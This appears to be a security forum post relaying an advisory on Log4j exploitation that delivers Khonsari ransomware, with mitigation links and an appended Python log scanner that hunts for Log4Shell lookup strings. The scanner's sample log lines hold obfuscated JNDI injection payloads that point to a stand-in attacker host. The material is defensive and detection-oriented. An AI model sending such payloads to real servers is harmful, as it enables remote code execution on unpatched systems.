Log4j Vulnerability Information
<blockquote data-quote="MJ Shoer" data-source="post: 2483" data-attributes="member: 3"><p><h3><span style="color: rgb(184, 49, 47)">Severity: High</span> <span style="color: rgb(65, 168, 95)">TLP: Green</span> Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware</h3><p><strong>Tags</strong></p><ol> <li data-xf-list-type="ol"><strong>Cybercriminal Attack</strong></li> <li data-xf-list-type="ol"><strong>Ransomware Attack</strong></li> </ol><p><strong>Hackers Exploit Log4j Vulnerability to Infect Computers with Khonsari Ransomware</strong></p><p><strong></strong></p><p><strong>Summary:</strong></p><p>“Romanian cybersecurity technology company Bitdefender on Monday revealed that attempts are being made to target Windows machines with a novel ransomware family called Khonsari as well as a remote access Trojan named Orcus by exploiting the recently disclosed critical Log4j vulnerability. The attack leverages the remote code execution flaw to download an additional payload, a .NET binary, from a remote server that encrypts all the files with the extension ".khonsari" and displays a ransom note that urges the victims to make a Bitcoin payment in exchange for recovering access to the files, (<a href="https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html" target="_blank">TheHackerNews, 2021</a>).”</p><p></p><p><strong>Analyst Comments:</strong></p><p>It was only a matter of time before a ransomware attack would be confirmed after the log4j vulnerability was disclosed. Initially, some were unsure how the vulnerability could be leveraged in an actual cyber-attack. 
This report from Bitdefender confirms that ransomware operators will more than likely continue to leverage the vulnerability for some time.</p><p></p><p><strong>Mitigation:</strong></p><p>CISA released its website, which is dedicated to assisting companies in remediating vulnerabilities associated with CVE-2021-44228.</p><ul> <li data-xf-list-type="ul"><a href="https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance" target="_blank">https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance</a></li> <li data-xf-list-type="ul"><a href="https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/" target="_blank">Microsoft blog: Guidance for Preventing, Detecting, and Hunting for CVE-2021-44228 Log4j 2 Exploitation</a></li> <li data-xf-list-type="ul"><a href="https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html" target="_blank">Cisco Talos Intelligence Group - Comprehensive Threat Intelligence: Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild</a></li> <li data-xf-list-type="ul"><a href="https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/" target="_blank">Palo Alto Networks blog: Apache log4j Vulnerability CVE-2021-44228: Analysis and Mitigations</a></li> <li data-xf-list-type="ul"><a href="https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/" target="_blank">CrowdStrike blog: Log4j2 Vulnerability Analysis and Mitigation Recommendations</a></li> <li data-xf-list-type="ul"><a href="https://securityintelligence.com/posts/apache-log4j-zero-day-vulnerability-update/" target="_blank">IBM Security Intelligence blog: How Log4j Vulnerability Could Impact You</a></li> <li data-xf-list-type="ul"><a 
href="https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability?utm_campaign=00023584&utm_promoter=tenable-ops&utm_medium=homepage-hero&utm_content=other-rr-log4j-blog&utm_source=tenable-dot-com" target="_blank">Tenable blog: CVE-2021-44228: Proof-of-Concept for Critical Apache Log4j Remote Code Execution Vulnerability Available (Log4Shell)</a></li> <li data-xf-list-type="ul"><a href="https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day" target="_blank">Broadcom's Symantec Enterprise blog: Apache Log4j Zero-Day Being Exploited in the Wild content</a></li> <li data-xf-list-type="ul"><a href="https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html" target="_blank">Splunk's blog: Log4Shell - Detecting Log4j Vulnerability (CVE-2021-44228) Continued</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/vsphere/2021/12/vmsa-2021-0028-log4j-what-you-need-to-know.html" target="_blank">VMware Blog: Log4j Vulnerability Security Advisory: What You Need to Know</a></li> <li data-xf-list-type="ul"><a href="https://blogs.vmware.com/security/2021/12/investigating-cve-2021-44228-log4shell-vulnerability.html" target="_blank">Investigating CVE-2021-44228 Log4Shell Vulnerability: VMWare Threat Research</a></li> </ul><p><strong>Source:</strong></p><p><a href="https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild" target="_blank">https://businessinsights.bitdefende...vulnerability-in-log4j2-exploited-in-the-wild</a></p><p><a href="https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html" target="_blank">https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html</a></p></blockquote><p></p>
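Added example, not part of MJ Shoer's post or any of the linked vendor guidance: a small detector for CVE-2021-44228 lookup strings in web-server access logs, the kind of hunting the "Detecting" links above describe. It undoes the common obfuscations (URL encoding, `${lower:x}`/`${upper:x}` and `${::-x}` default-value tricks) before matching; the log lines, IPs and hostname are constructed placeholders.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access-log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [13/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://evil.example/a}"
203.0.113.9 - - [13/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://evil.example/b} HTTP/1.1" 404 0 "-" "curl/7.79"
203.0.113.9 - - [13/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://evil.example/c}"
198.51.100.2 - - [13/Dec/2021:10:02:00 +0000] "GET /search?q=jndi+tutorial HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ${lower:x} / ${upper:x} whose body holds no further lookup (innermost first).
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${:-x}, ${::-x}, ${env:MISSING:-x}: log4j substitutes the default value x.
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The lookup itself; the protocol scheme (ldap, rmi, dns, ...) is captured if present.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)?", re.IGNORECASE)


def _apply_case(m) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize(text: str) -> str:
    """Resolve obfuscation from the innermost lookup outwards until nothing changes."""
    for _ in range(20):  # bounded so a pathological line cannot loop forever
        new = unquote(text)
        new = _CASE.sub(_apply_case, new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def find_log4shell(line: str) -> Optional[Dict[str, str]]:
    """Return the scheme and normalized line when a JNDI lookup is present, else None."""
    normalized = normalize(line)
    m = _JNDI.search(normalized)
    if not m:
        return None
    return {"scheme": (m.group(1) or "").lower(), "normalized": normalized}


def scan(log_text: str) -> List[Dict[str, str]]:
    """Scan a whole log; each hit carries its 1-based line number and the scheme."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), start=1):
        hit = find_log4shell(line)
        if hit:
            hits.append({"line": str(number), **hit})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']}: jndi lookup via {hit['scheme'] or 'unknown scheme'}")
```

A hit means an exploitation attempt reached the server, not that it succeeded; correlate with outbound LDAP/RMI connections from the host and with the patch status of its log4j2 copies.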